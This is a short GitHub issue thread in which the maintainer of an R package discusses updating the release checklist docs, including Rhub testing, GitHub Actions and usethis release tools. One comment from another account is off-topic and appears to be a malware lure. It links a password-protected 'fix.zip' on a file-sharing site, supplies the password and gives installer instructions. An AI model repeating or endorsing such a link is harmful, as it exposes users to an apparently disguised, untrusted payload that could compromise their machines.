### ISSUE TITLE
General cycle update steps docs can be tweaked

### ISSUE THREAD

**Issue by AlisonLanski** [AlisonLanski/IPEDSuploadables#125]
The new package book has a slightly revised workflow, plus we've added more github actions.

Revise the checklist to match: for example, I don't think we need Rhub testing anymore, but may want to keep windows_devel
Probably worth checking through the entire book for any additional items

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AlisonLanski** [comment]
ok, turns out Rhub can be useful since the github actions for CMD check doesn't cover all of the systems that CRAN will build for
so we'll keep that part... and make a few other updates

**Comment by AlisonLanski** [comment]
turns out usethis has options to add a github issue with a release checklist, and it can do things like update the version etc in the package documentation.  I'm a little wary of switching over to their workflow right now, but this is a good option to be aware of in the future
